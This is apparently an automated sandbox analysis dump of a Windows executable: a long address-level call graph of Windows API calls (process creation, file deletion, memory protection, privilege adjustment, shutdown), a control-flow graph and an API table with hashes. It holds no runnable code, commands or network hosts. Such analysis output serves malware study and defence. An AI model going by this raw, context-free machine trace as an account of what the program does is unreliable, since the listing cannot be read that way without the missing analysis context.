5928->5905 5936 406978 5929->5936 5931 4069fe 5932 406a06 GetFileAttributesA 5931->5932 5933 406a1b 5932->5933 5934 403198 4 API calls 5933->5934 5935 406a23 5934->5935 5935->5857 5946 406744 5936->5946 5938 4069b0 5941 4069c6 5938->5941 5942 4069bb 5938->5942 5940 406989 5940->5938 5953 406970 CharPrevA 5940->5953 5954 403454 5941->5954 5943 40322c 4 API calls 5942->5943 5945 4069c4 5943->5945 5945->5931 5949 406755 5946->5949 5947 4067b9 5948 406680 IsDBCSLeadByte 5947->5948 5951 4067b4 5947->5951 5948->5951 5949->5947 5950 406773 5949->5950 5950->5951 5961 406680 IsDBCSLeadByte 5950->5961 5951->5940 5953->5940 5955 403486 5954->5955 5956 403459 5954->5956 5957 403198 4 API calls 5955->5957 5956->5955 5959 40346d 5956->5959 5958 40347c 5957->5958 5958->5945 5960 403278 4 API calls 5959->5960 5960->5958 5962 406694 5961->5962 5962->5950 5964 403198 4 API calls 5963->5964 5965 4091d1 5964->5965 5968 4091fe 5965->5968 5980 4032a8 5965->5980 5983 403494 5965->5983 5969 403198 4 API calls 5968->5969 5970 409213 5969->5970 5970->5888 5987 408f70 5971->5987 5973 40904a 5974 40904e 5973->5974 5993 406a48 5973->5993 5974->5888 5977 409081 5996 408fac 5977->5996 5981 403278 4 API calls 5980->5981 5982 4032b5 5981->5982 5982->5965 5984 403498 5983->5984 5986 4034c3 5983->5986 5985 4034f0 4 API calls 5984->5985 5985->5986 5986->5965 5988 408f7a 5987->5988 5989 408f7e 5987->5989 5988->5973 5990 408fa0 SetLastError 5989->5990 5991 408f87 Wow64DisableWow64FsRedirection 5989->5991 5992 408f9b 5990->5992 5991->5992 5992->5973 5994 4069dc 7 API calls 5993->5994 5995 406a52 GetLastError 5994->5995 5995->5977 5997 408fb1 Wow64RevertWow64FsRedirection 5996->5997 5998 408fbb 5996->5998 5997->5998 5998->5888 6000 403198 4 API calls 5999->6000 6006 408cb1 5999->6006 6000->6006 6001 408cdc 6002 4031b8 4 API calls 6001->6002 6004 408d69 6002->6004 6003 408cc8 6007 4032fc 4 API calls 6003->6007 6004->5697 6005 403278 4 API calls 6005->6006 6006->6001 6006->6003 6006->6005 6008 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6006->6008 6007->6001 6008->6006 6010 406744 IsDBCSLeadByte 6009->6010 6012 406835 6010->6012 6011 40687f 6011->5711 6012->6011 6013 406680 IsDBCSLeadByte 6012->6013 6013->6012 6015 4068f3 6014->6015 6016 406820 IsDBCSLeadByte 6015->6016 6018 4068fe 6016->6018 6017 4066ea 6017->5716 6017->5717 6018->6017 6019 406680 IsDBCSLeadByte 6018->6019 6019->6018 6021 406957 6020->6021 6022 40695b 6020->6022 6021->5730 6025 406970 CharPrevA 6022->6025 6024 40696c 6024->5730 6025->6024 6027 402bd5 RaiseException 6026->6027 6028 402be6 6026->6028 6027->6028 6028->5754 6281 402e64 6282 402e69 6281->6282 6283 402e7a RtlUnwind 6282->6283 6284 402e5e 6282->6284 6285 402e9d 6283->6285 6302 40667c IsDBCSLeadByte 6303 406694 6302->6303 6715 403f7d 6716 403fa2 6715->6716 6719 403f84 6715->6719 6718 403e8e 4 API calls 6716->6718 6716->6719 6717 403f8c 6718->6719 6719->6717 6720 402674 4 API calls 6719->6720 6721 403fca 6720->6721 6728 403d02 6735 403d12 6728->6735 6729 403ddf ExitProcess 6730 403db8 6732 403cc8 4 API calls 6730->6732 6731 403dea 6733 403dc2 6732->6733 6734 403cc8 4 API calls 6733->6734 6736 403dcc 6734->6736 6735->6729 6735->6730 6735->6731 6735->6735 6738 403da4 6735->6738 6739 403d8f MessageBoxA 6735->6739 6748 4019dc 6736->6748 6744 403fe4 6738->6744 6739->6730 6741 403dd1 6741->6729 6741->6731 6745 403fe8 6744->6745 6746 403f07 4 API calls 6745->6746 6747 404006 6746->6747 6749 401abb 6748->6749 6750 4019ed 6748->6750 6749->6741 6751 401a04 RtlEnterCriticalSection 6750->6751 6752 401a0e LocalFree 6750->6752 6751->6752 6753 401a41 6752->6753 6754 401a2f VirtualFree 6753->6754 6755 401a49 6753->6755 6754->6753 6756 401a70 LocalFree 6755->6756 6757 401a87 6755->6757 6756->6756 6756->6757 6758 401aa9 RtlDeleteCriticalSection 6757->6758 6759 401a9f RtlLeaveCriticalSection 6757->6759 6758->6741 6759->6758 6312 404206 6313 4041cc 6312->6313 6314 40420a 6312->6314 6315 404282 6314->6315 6316 403154 4 API calls 6314->6316 6317 404323 6316->6317 6318 402c08 6321 402c82 6318->6321 6322 402c19 6318->6322 6319 402c56 RtlUnwind 6320 403154 4 API calls 6319->6320 6320->6321 6322->6319 6322->6321 6325 402b28 6322->6325 6326 402b31 RaiseException 6325->6326 6327 402b47 6325->6327 6326->6327 6327->6319 6328 408c10 6329 408c17 6328->6329 6330 403198 4 API calls 6329->6330 6338 408cb1 6330->6338 6331 408cdc 6332 4031b8 4 API calls 6331->6332 6334 408d69 6332->6334 6333 408cc8 6336 4032fc 4 API calls 6333->6336 6335 403278 4 API calls 6335->6338 6336->6331 6337 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6337->6338 6338->6331 6338->6333 6338->6335 6338->6337 6339 40a011 6340 40a036 6339->6340 6341 407918 InterlockedExchange 6340->6341 6343 40a060 6341->6343 6342 40a070 6349 4076ac SetEndOfFile 6342->6349 6343->6342 6344 409aa0 4 API calls 6343->6344 6344->6342 6346 40a08c 6347 4025ac 4 API calls 6346->6347 6348 40a0c3 6347->6348 6350 4076c3 6349->6350 6351 4076bc 6349->6351 6350->6346 6352 40748c 21 API calls 6351->6352 6352->6350 6764 409916 6765 409918 6764->6765 6766 40993a 6765->6766 6767 409956 CallWindowProcA 6765->6767 6767->6766 6080 407017 6081 407008 SetErrorMode 6080->6081 6357 403018 6358 403070 6357->6358 6359 403025 6357->6359 6360 40302a RtlUnwind 6359->6360 6361 40304e 6360->6361 6363 402f78 6361->6363 6364 402be8 6361->6364 6365 402bf1 RaiseException 6364->6365 6366 402c04 6364->6366 6365->6366 6366->6358 6774 409918 6775 409927 6774->6775 6776 40993a 6774->6776 6775->6776 6777 409956 CallWindowProcA 6775->6777 6777->6776 6371 40901e 6372 409010 6371->6372 6373 408fac Wow64RevertWow64FsRedirection 6372->6373 6374 409018 6373->6374 6375 409020 SetLastError 6376 409029 6375->6376 6387 403a28 ReadFile 6388 403a46 6387->6388 6389 403a49 GetLastError 6387->6389 6218 40762c ReadFile 6219 407663 6218->6219 6220 40764c 6218->6220 6221 407652 GetLastError 6220->6221 6222 40765c 6220->6222 6221->6219 6221->6222 6223 40748c 21 API calls 6222->6223 6223->6219 6394 40a02c 6395 409aa0 4 API calls 6394->6395 6396 40a031 6395->6396 6397 40a036 6396->6397 6398 402f24 5 API calls 6396->6398 6399 407918 InterlockedExchange 6397->6399 6398->6397 6400 40a060 6399->6400 6401 40a070 6400->6401 6402 409aa0 4 API calls 6400->6402 6403 4076ac 22 API calls 6401->6403 6402->6401 6404 40a08c 6403->6404 6405 4025ac 4 API calls 6404->6405 6406 40a0c3 6405->6406 6778 40712e 6779 407118 6778->6779 6780 403198 4 API calls 6779->6780 6781 407120 6780->6781 6782 403198 4 API calls 6781->6782 6783 407128 6782->6783 6784 408f30 6787 408dfc 6784->6787 6788 408e05 6787->6788 6789 403198 4 API calls 6788->6789 6790 408e13 6788->6790 6789->6788 6791 403932 6792 403924 6791->6792 6795 40374c 6792->6795 6794 40392c 6796 403759 6795->6796 6797 403766 6795->6797 6796->6797 6798 403779 VariantClear 6796->6798 6797->6794 6798->6794 6029 4075c4 SetFilePointer 6030 4075f7 6029->6030 6031 4075e7 GetLastError 6029->6031 6031->6030 6032 4075f0 6031->6032 6033 40748c 21 API calls 6032->6033 6033->6030 6407 405ac4 6408 405acc 6407->6408 6413 405ad4 6407->6413 6409 405adb 6408->6409 6410 405ad2 6408->6410 6411 405930 5 API calls 6409->6411 6414 405a3c 6410->6414 6411->6413 6421 405a44 6414->6421 6415 405a5e 6416 405a63 6415->6416 6417 405a7a 6415->6417 6419 405930 5 API calls 6416->6419 6420 403154 4 API calls 6417->6420 6418 403154 4 API calls 6418->6421 6422 405a76 6419->6422 6423 405a7f 6420->6423 6421->6415 6421->6418 6425 403154 4 API calls 6422->6425 6424 4059a0 19 API calls 6423->6424 6424->6422 6426 405aa8 6425->6426 6427 403154 4 API calls 6426->6427 6428 405ab6 6427->6428 6428->6413 6429 4076c8 WriteFile 6430 4076e8 6429->6430 6431 4076ef 6429->6431 6432 40748c 21 API calls 6430->6432 6433 407700 6431->6433 6434 4073ec 20 API calls 6431->6434 6432->6431 6434->6433 6435 40a2ca 6444 4096fc 6435->6444 6438 402f24 5 API calls 6439 40a2d4 6438->6439 6440 403198 4 API calls 6439->6440 6441 40a2f3 6440->6441 6442 403198 4 API calls 6441->6442 6443 40a2fb 6442->6443 6453 40569c 6444->6453 6446 409717 6448 409745 6446->6448 6459 40720c 6446->6459 6450 403198 4 API calls 6448->6450 6449 409735 6452 40973d MessageBoxA 6449->6452 6451 40975a 6450->6451 6451->6438 6452->6448 6454 403154 4 API calls 6453->6454 6455 4056a1 6454->6455 6456 4056b9 6455->6456 6457 403154 4 API calls 6455->6457 6456->6446 6458 4056af 6457->6458 6458->6446 6460 40569c 4 API calls 6459->6460 6461 40721b 6460->6461 6462 407221 6461->6462 6463 40722f 6461->6463 6464 40322c 4 API calls 6462->6464 6465 40723f 6463->6465 6467 40724b 6463->6467 6468 40722d 6464->6468 6470 4071d0 6465->6470 6477 4032b8 6467->6477 6468->6449 6471 40322c 4 API calls 6470->6471 6472 4071df 6471->6472 6473 4071fc 6472->6473 6474 406950 CharPrevA 6472->6474 6473->6468 6475 4071eb 6474->6475 6475->6473 6476 4032fc 4 API calls 6475->6476 6476->6473 6478 403278 4 API calls 6477->6478 6479 4032c2 6478->6479 6479->6468 6480 402ccc 6481 402cdd 6480->6481 6485 402cfe 6480->6485 6482 402d88 RtlUnwind 6481->6482 6484 402b28 RaiseException 6481->6484 6481->6485 6483 403154 4 API calls 6482->6483 6483->6485 6486 402d7f 6484->6486 6486->6482 6807 403fcd 6808 403f07 4 API calls 6807->6808 6809 403fd6 6808->6809 6810 403e9c 4 API calls 6809->6810 6811 403fe2 6810->6811 5465 4024d0 5466 4024e4 5465->5466 5467 4024f7 5465->5467 5504 401918 RtlInitializeCriticalSection 5466->5504 5469 402518 5467->5469 5470 40250e RtlEnterCriticalSection 5467->5470 5481 402300 5469->5481 5470->5469 5473 4024ed 5475 402525 5478 402581 5475->5478 5479 402577 RtlLeaveCriticalSection 5475->5479 5477 402531 5477->5475 5511 40215c 5477->5511 5479->5478 5482 402314 5481->5482 5483 4023b8 5482->5483 5484 402335 5482->5484 5485 402344 5483->5485 5489 402455 5483->5489 5528 401d80 5483->5528 5536 401e84 5483->5536 5484->5485 5525 401b74 5484->5525 5485->5475 5491 401fd4 5485->5491 5489->5485 5532 401d00 5489->5532 5492 401fe8 5491->5492 5493 401ffb 5491->5493 5494 401918 4 API calls 5492->5494 5495 402012 RtlEnterCriticalSection 5493->5495 5498 40201c 5493->5498 5496 401fed 5494->5496 5495->5498 5496->5493 5497 401ff1 5496->5497 5503 402052 5497->5503 5498->5503 5618 401ee0 5498->5618 5501 402147 5501->5477 5502 40213d RtlLeaveCriticalSection 5502->5501 5503->5477 5505 40193c RtlEnterCriticalSection 5504->5505 5506 401946 5504->5506 5505->5506 5507 401964 LocalAlloc 5506->5507 5508 40197e 5507->5508 5509 4019c3 RtlLeaveCriticalSection 5508->5509 5510 4019cd 5508->5510 5509->5510 5510->5467 5510->5473 5512 40217a 5511->5512 5513 402175 5511->5513 5514 4021ab RtlEnterCriticalSection 5512->5514 5517 4021b5 5512->5517 5521 40217e 5512->5521 5515 401918 4 API calls 5513->5515 5514->5517 5515->5512 5516 4021c1 5519 4022e3 RtlLeaveCriticalSection 5516->5519 5520 4022ed 5516->5520 5517->5516 5518 402244 5517->5518 5523 402270 5517->5523 5518->5521 5522 401d80 7 API calls 5518->5522 5519->5520 5520->5475 5521->5475 5522->5521 5523->5516 5524 401d00 7 API calls 5523->5524 5524->5516 5526 40215c 9 API calls 5525->5526 5527 401b95 5526->5527 5527->5485 5529 401d89 5528->5529 5531 401d92 5528->5531 5530 401b74 9 API calls 5529->5530 5529->5531 5530->5531 5531->5483 5533 401d1e 5532->5533 5534 401d4e 5532->5534 5533->5485 5534->5533 5541 401c68 5534->5541 5596 401768 5536->5596 5538 401e99 5539 401ea6 5538->5539 5607 401dcc 5538->5607 5539->5483 5542 401c7a 5541->5542 5543 401c9d 5542->5543 5544 401caf 5542->5544 5554 40188c 5543->5554 5545 40188c 3 API calls 5544->5545 5547 401cad 5545->5547 5548 401cc5 5547->5548 5564 401b44 5547->5564 5548->5533 5550 401cd4 5551 401cee 5550->5551 5569 401b98 5550->5569 5574 4013a0 5551->5574 5555 4018b2 5554->5555 5563 40190b 5554->5563 5578 401658 5555->5578 5560 4018e6 5562 4013a0 LocalAlloc 5560->5562 5560->5563 5562->5563 5563->5547 5565 401b61 5564->5565 5566 401b52 5564->5566 5565->5550 5567 401d00 9 API calls 5566->5567 5568 401b5f 5567->5568 5568->5550 5570 401bab 5569->5570 5571 401b9d 5569->5571 5570->5551 5572 401b74 9 API calls 5571->5572 5573 401baa 5572->5573 5573->5551 5575 4013ab 5574->5575 5576 4013c6 5575->5576 5577 4012e4 LocalAlloc 5575->5577 5576->5548 5577->5576 5580 40168f 5578->5580 5579 4016cf 5582 40132c 5579->5582 5580->5579 5581 4016a9 VirtualFree 5580->5581 5581->5580 5583 401348 5582->5583 5590 4012e4 5583->5590 5586 40150c 5588 40153b 5586->5588 5587 401594 5587->5560 5588->5587 5589 401568 VirtualFree 5588->5589 5589->5588 5593 40128c 5590->5593 5592 4012ef 5592->5560 5592->5586 5594 401298 LocalAlloc 5593->5594 5595 4012aa 5593->5595 5594->5595 5595->5592 5595->5595 5598 401787 5596->5598 5597 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5597->5598 5598->5597 5599 40183b 5598->5599 5601 40132c LocalAlloc 5598->5601 5602 401821 5598->5602 5603 4017d6 5598->5603 5604 4017e7 5599->5604 5614 4015c4 5599->5614 5601->5598 5605 40150c VirtualFree 5602->5605 5606 40150c VirtualFree 5603->5606 5604->5538 5605->5604 5606->5604 5608 401d80 9 API calls 5607->5608 5609 401de0 5608->5609 5610 40132c LocalAlloc 5609->5610 5611 401df0 5610->5611 5612 401b44 9 API calls 5611->5612 5613 401df8 5611->5613 5612->5613 5613->5539 5615 40160a 5614->5615 5616 401626 VirtualAlloc 5615->5616 5617 40163a 5615->5617 5616->5615 5616->5617 5617->5604 5622 401ef0 5618->5622 5619 401f1c 5620 401d00 9 API calls 5619->5620 5623 401f40 5619->5623 5620->5623 5622->5619 5622->5623 5624 401e58 5622->5624 5623->5501 5623->5502 5629 4016d8 5624->5629 5627 401dcc 9 API calls 5628 401e75 5627->5628 5628->5622 5632 4016f4 5629->5632 5631 4016fe 5633 4015c4 VirtualAlloc 5631->5633 5632->5631 5634 40175b 5632->5634 5635 40132c LocalAlloc 5632->5635 5637 40174f 5632->5637 5639 401430 5632->5639 5636 40170a 5633->5636 5634->5627 5634->5628 5635->5632 5636->5634 5638 40150c VirtualFree 5637->5638 5638->5634 5640 40143f VirtualAlloc 5639->5640 5642 40146c 5640->5642 5643 40148f 5640->5643 5644 4012e4 LocalAlloc 5642->5644 5643->5632 5645 401478 5644->5645 5645->5643 5646 40147c VirtualFree 5645->5646 5646->5643 6487 4028d2 6488 4028da 6487->6488 6489 403554 4 API calls 6488->6489 6490 4028ef 6488->6490 6489->6488 6491 4025ac 4 API calls 6490->6491 6492 4028f4 6491->6492 6812 4019d3 6813 4019ba 6812->6813 6814 4019c3 RtlLeaveCriticalSection 6813->6814 6815 4019cd 6813->6815 6814->6815 6034 407fd4 6035 407fe6 6034->6035 6037 407fed 6034->6037 6045 407f10 6035->6045 6038 408021 6037->6038 6040 408015 6037->6040 6041 408017 6037->6041 6039 40804e 6038->6039 6043 407d7c 19 API calls 6038->6043 6059 407e2c 6040->6059 6056 407d7c 6041->6056 6043->6039 6046 407f25 6045->6046 6047 407f34 6046->6047 6048 407d7c 19 API calls 6046->6048 6049 407f6e 6047->6049 6050 407d7c 19 API calls 6047->6050 6048->6047 6051 407f82 6049->6051 6052 407d7c 19 API calls 6049->6052 6050->6049 6055 407fae 6051->6055 6066 407eb8 6051->6066 6052->6051 6055->6037 6069 4058b4 6056->6069 6058 407d9e 6058->6038 6060 405184 19 API calls 6059->6060 6061 407e57 6060->6061 6077 407de4 6061->6077 6063 407e5f 6064 403198 4 API calls 6063->6064 6065 407e74 6064->6065 6065->6038 6067 407ec7 VirtualFree 6066->6067 6068 407ed9 VirtualAlloc 6066->6068 6067->6068 6068->6055 6070 4058c0 6069->6070 6071 405184 19 API calls 6070->6071 6072 4058ed 6071->6072 6073 4031e8 4 API calls 6072->6073 6074 4058f8 6073->6074 6075 403198 4 API calls 6074->6075 6076 40590d 6075->6076 6076->6058 6078 4058b4 19 API calls 6077->6078 6079 407e06 6078->6079 6079->6063 6497 40a0d5 6498 40a105 6497->6498 6499 40a10f CreateWindowExA SetWindowLongA 6498->6499 6500 405184 19 API calls 6499->6500 6501 40a192 6500->6501 6502 4032fc 4 API calls 6501->6502 6503 40a1a0 6502->6503 6504 4032fc 4 API calls 6503->6504 6505 40a1ad 6504->6505 6506 406b7c 5 API calls 6505->6506 6507 40a1b9 6506->6507 6508 4032fc 4 API calls 6507->6508 6509 40a1c2 6508->6509 6510 4099a4 29 API calls 6509->6510 6511 40a1d4 6510->6511 6512 409884 5 API calls 6511->6512 6513 40a1e7 6511->6513 6512->6513 6514 40a220 6513->6514 6515 4094d8 9 API calls 6513->6515 6516 40a239 6514->6516 6519 40a233 RemoveDirectoryA 6514->6519 6515->6514 6517 40a242 73EA5CF0 6516->6517 6518 40a24d 6516->6518 6517->6518 6520 40a275 6518->6520 6521 40357c 4 API calls 6518->6521 6519->6516 6522 40a26b 6521->6522 6523 4025ac 4 API calls 6522->6523 6523->6520 6082 40a0e7 6083 40a0eb SetLastError 6082->6083 6114 409648 GetLastError 6083->6114 6086 40a105 6088 40a10f CreateWindowExA SetWindowLongA 6086->6088 6087 402f24 5 API calls 6087->6086 6089 405184 19 API calls 6088->6089 6090 40a192 6089->6090 6091 4032fc 4 API calls 6090->6091 6092 40a1a0 6091->6092 6093 4032fc 4 API calls 6092->6093 6094 40a1ad 6093->6094 6127 406b7c GetCommandLineA 6094->6127 6097 4032fc 4 API calls 6098 40a1c2 6097->6098 6132 4099a4 6098->6132 6101 409884 5 API calls 6102 40a1e7 6101->6102 6103 40a220 6102->6103 6104 40a207 6102->6104 6106 40a239 6103->6106 6109 40a233 RemoveDirectoryA 6103->6109 6148 4094d8 6104->6148 6107 40a242 73EA5CF0 6106->6107 6108 40a24d 6106->6108 6107->6108 6110 40a275 6108->6110 6156 40357c 6108->6156 6109->6106 6112 40a26b 6113 4025ac 4 API calls 6112->6113 6113->6110 6115 404c84 19 API calls 6114->6115 6116 40968f 6115->6116 6117 407284 5 API calls 6116->6117 6118 40969f 6117->6118 6119 408da8 4 API calls 6118->6119 6120 4096b4 6119->6120 6121 405880 4 API calls 6120->6121 6122 4096c3 6121->6122 6123 4031b8 4 API calls 6122->6123 6124 4096e2 6123->6124 6125 403198 4 API calls 6124->6125 6126 4096ea 6125->6126 6126->6086 6126->6087 6128 406af0 4 API calls 6127->6128 6129 406ba1 6128->6129 6130 403198 4 API calls 6129->6130 6131 406bbf 6130->6131 6131->6097 6133 4033b4 4 API calls 6132->6133 6134 4099df 6133->6134 6135 409a11 CreateProcessA 6134->6135 6136 409a24 CloseHandle 6135->6136 6137 409a1d 6135->6137 6139 409a2d 6136->6139 6138 409648 21 API calls 6137->6138 6138->6136 6169 409978 6139->6169 6142 409a49 6143 409978 3 API calls 6142->6143 6144 409a4e GetExitCodeProcess CloseHandle 6143->6144 6145 409a6e 6144->6145 6146 403198 4 API calls 6145->6146 6147 409a76 6146->6147 6147->6101 6147->6102 6149 409532 6148->6149 6150 4094eb 6148->6150 6149->6103 6150->6149 6151 4094f3 Sleep 6150->6151 6152 409503 Sleep 6150->6152 6154 40951a GetLastError 6150->6154 6173 408fbc 6150->6173 6151->6150 6152->6150 6154->6149 6155 409524 GetLastError 6154->6155 6155->6149 6155->6150 6157 403591 6156->6157 6165 4035a0 6156->6165 6161 4035d0 6157->6161 6162 40359b 6157->6162 6164 4035b6 6157->6164 6158 4035b1 6163 403198 4 API calls 6158->6163 6159 4035b8 6160 4031b8 4 API calls 6159->6160 6160->6164 6161->6164 6167 40357c 4 API calls 6161->6167 6162->6165 6166 4035ec 6162->6166 6163->6164 6164->6112 6165->6158 6165->6159 6166->6164 6181 403554 6166->6181 6167->6161 6170 40998c PeekMessageA 6169->6170 6171 409980 TranslateMessage DispatchMessageA 6170->6171 6172 40999e MsgWaitForMultipleObjects 6170->6172 6171->6170 6172->6139 6172->6142 6174 408f70 2 API calls 6173->6174 6175 408fd2 6174->6175 6176 408fd6 6175->6176 6177 408ff2 DeleteFileA GetLastError 6175->6177 6176->6150 6178 409010 6177->6178 6179 408fac Wow64RevertWow64FsRedirection 6178->6179 6180 409018 6179->6180 6180->6150 6182 403566 6181->6182 6184 403578 6182->6184 6185 403604 6182->6185 6184->6166 6186 40357c 6185->6186 6187 4035a0 6186->6187 6191 4035d0 6186->6191 6192 40359b 6186->6192 6194 4035b6 6186->6194 6188 4035b1 6187->6188 6189 4035b8 6187->6189 6193 403198 4 API calls 6188->6193 6190 4031b8 4 API calls 6189->6190 6190->6194 6191->6194 6196 40357c 4 API calls 6191->6196 6192->6187 6195 4035ec 6192->6195 6193->6194 6194->6182 6195->6194 6197 403554 4 API calls 6195->6197 6196->6191 6197->6195 6819 402be9 RaiseException 6820 402c04 6819->6820 6530 402af2 6531 402afe 6530->6531 6534 402ed0 6531->6534 6535 403154 4 API calls 6534->6535 6537 402ee0 6535->6537 6536 402b03 6537->6536 6539 402b0c 6537->6539 6540 402b25 6539->6540 6541 402b15 RaiseException 6539->6541 6540->6536 6541->6540 6821 402dfa 6822 402e26 6821->6822 6823 402e0d 6821->6823 6825 402ba4 6823->6825 6826 402bc9 6825->6826 6827 402bad 6825->6827 6826->6822 6828 402bb5 RaiseException 6827->6828 6828->6826 6829 4075fa GetFileSize 6830 407626 6829->6830 6831 407616 GetLastError 6829->6831 6831->6830 6832 40761f 6831->6832 6833 40748c 21 API calls 6832->6833 6833->6830 6834 406ffb 6835 407008 SetErrorMode 6834->6835 6546 403a80 CloseHandle 6547 403a90 6546->6547 6548 403a91 GetLastError 6546->6548 6549 40a282 6550 40a1f4 6549->6550 6551 40a220 6550->6551 6552 4094d8 9 API calls 6550->6552 6553 40a239 6551->6553 6556 40a233 RemoveDirectoryA 6551->6556 6552->6551 6554 40a242 73EA5CF0 6553->6554 6555 40a24d 6553->6555 6554->6555 6557 40a275 6555->6557 6558 40357c 4 API calls 6555->6558 6556->6553 6559 40a26b 6558->6559 6560 4025ac 4 API calls 6559->6560 6560->6557 6561 404283 6562 4042c3 6561->6562 6563 403154 4 API calls 6562->6563 6564 404323 6563->6564 6836 404185 6837 4041ff 6836->6837 6838 4041cc 6837->6838 6839 403154 4 API calls 6837->6839 6840 404323 6839->6840 6565 40a287 6566 40a290 6565->6566 6568 40a2bb 6565->6568 6575 409448 6566->6575 6570 403198 4 API calls 6568->6570 6569 40a295 6569->6568 6572 40a2b3 MessageBoxA 6569->6572 6571 40a2f3 6570->6571 6573 403198 4 API calls 6571->6573 6572->6568 6574 40a2fb 6573->6574 6576 409454 GetCurrentProcess OpenProcessToken 6575->6576 6577 4094af ExitWindowsEx 6575->6577 6578 409466 6576->6578 6579 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6576->6579 6577->6578 6578->6569 6579->6577 6579->6578 6580 403e87 6581 403e4c 6580->6581 6582 403e67 6581->6582 6583 403e62 6581->6583 6584 403e7b 6581->6584 6587 403e78 6582->6587 6593 402674 6582->6593 6589 403cc8 6583->6589 6586 402674 4 API calls 6584->6586 6586->6587 6590 403cd6 6589->6590 6591 402674 4 API calls 6590->6591 6592 403ceb 6590->6592 6591->6592 6592->6582 6594 403154 4 API calls 6593->6594 6595 40267a 6594->6595 6595->6587 6600 407e90 6601 407eb8 VirtualFree 6600->6601 6602 407e9d 6601->6602 6849 403991 6850 403983 6849->6850 6851 40374c VariantClear 6850->6851 6852 40398b 6851->6852 6853 405b92 6855 405b94 6853->6855 6854 405bd0 6858 405930 5 API calls 6854->6858 6855->6854 6856 405be7 6855->6856 6857 405bca 6855->6857 6862 404ccc 5 API calls 6856->6862 6857->6854 6859 405c3c 6857->6859 6860 405be3 6858->6860 6861 4059a0 19 API calls 6859->6861 6863 403198 4 API calls 6860->6863 6861->6860 6864 405c10 6862->6864 6865 405c76 6863->6865 6866 4059a0 19 API calls 6864->6866 6866->6860 6605 403e95 6606 403e4c 6605->6606 6607 403e62 6606->6607 6608 403e7b 6606->6608 6611 403e67 6606->6611 6609 403cc8 4 API calls 6607->6609 6610 402674 4 API calls 6608->6610 6609->6611 6612 403e78 6610->6612 6611->6612 6613 402674 4 API calls 6611->6613 6613->6612 6614 403a97 6615 403aac 6614->6615 6616 403bbc GetStdHandle 6615->6616 6617 403b0e CreateFileA 6615->6617 6627 403ab2 6615->6627 6618 403c17 GetLastError 6616->6618 6622 403bba 6616->6622 6617->6618 6619 403b2c 6617->6619 6618->6627 6621 403b3b GetFileSize 6619->6621 6619->6622 6621->6618 6623 403b4e SetFilePointer 6621->6623 6624 403be7 GetFileType 6622->6624 6622->6627 6623->6618 6628 403b6a ReadFile 6623->6628 6626 403c02 CloseHandle 6624->6626 6624->6627 6626->6627 6628->6618 6629 403b8c 6628->6629 6629->6622 6630 403b9f SetFilePointer 6629->6630 6630->6618 6631 403bb0 SetEndOfFile 6630->6631 6631->6618 6631->6622 6885 4011aa 6886 4011ac GetStdHandle 6885->6886 6224 4076ac SetEndOfFile 6225 4076c3 6224->6225 6226 4076bc 6224->6226 6227 40748c 21 API calls 6226->6227 6227->6225 6635 4028ac 6636 402594 4 API calls 6635->6636 6637 4028b6 6636->6637 6638 401ab9 6639 401a96 6638->6639 6640 401aa9 RtlDeleteCriticalSection 6639->6640 6641 401a9f RtlLeaveCriticalSection 6639->6641 6641->6640

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 116 409b30-409b54 GetSystemInfo VirtualQuery 117 409be4-409beb 116->117 118 409b5a 116->118 119 409bd9-409bde 118->119 119->117 120 409b5c-409b63 119->120 121 409bc5-409bd7 VirtualQuery 120->121 122 409b65-409b69 120->122 121->117 121->119 122->121 123 409b6b-409b73 122->123 124 409b84-409b95 VirtualProtect 123->124 125 409b75-409b78 123->125 127 409b97 124->127 128 409b99-409b9b 124->128 125->124 126 409b7a-409b7d 125->126 126->124 129 409b7f-409b82 126->129 127->128 130 409baa-409bad 128->130 129->124 129->128 131 409b9d-409ba6 call 409b28 130->131 132 409baf-409bb1 130->132 131->130 132->121 134 409bb3-409bc0 VirtualProtect 132->134 134->121
                                                            APIs
                                                            • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                            • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                            • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Virtual$ProtectQuery$InfoSystem
                                                            • String ID:
                                                            • API String ID: 2441996862-0
                                                            • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                            • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                            • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                            • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                            APIs
                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3384334441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3384291060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384391434.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3384437276.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
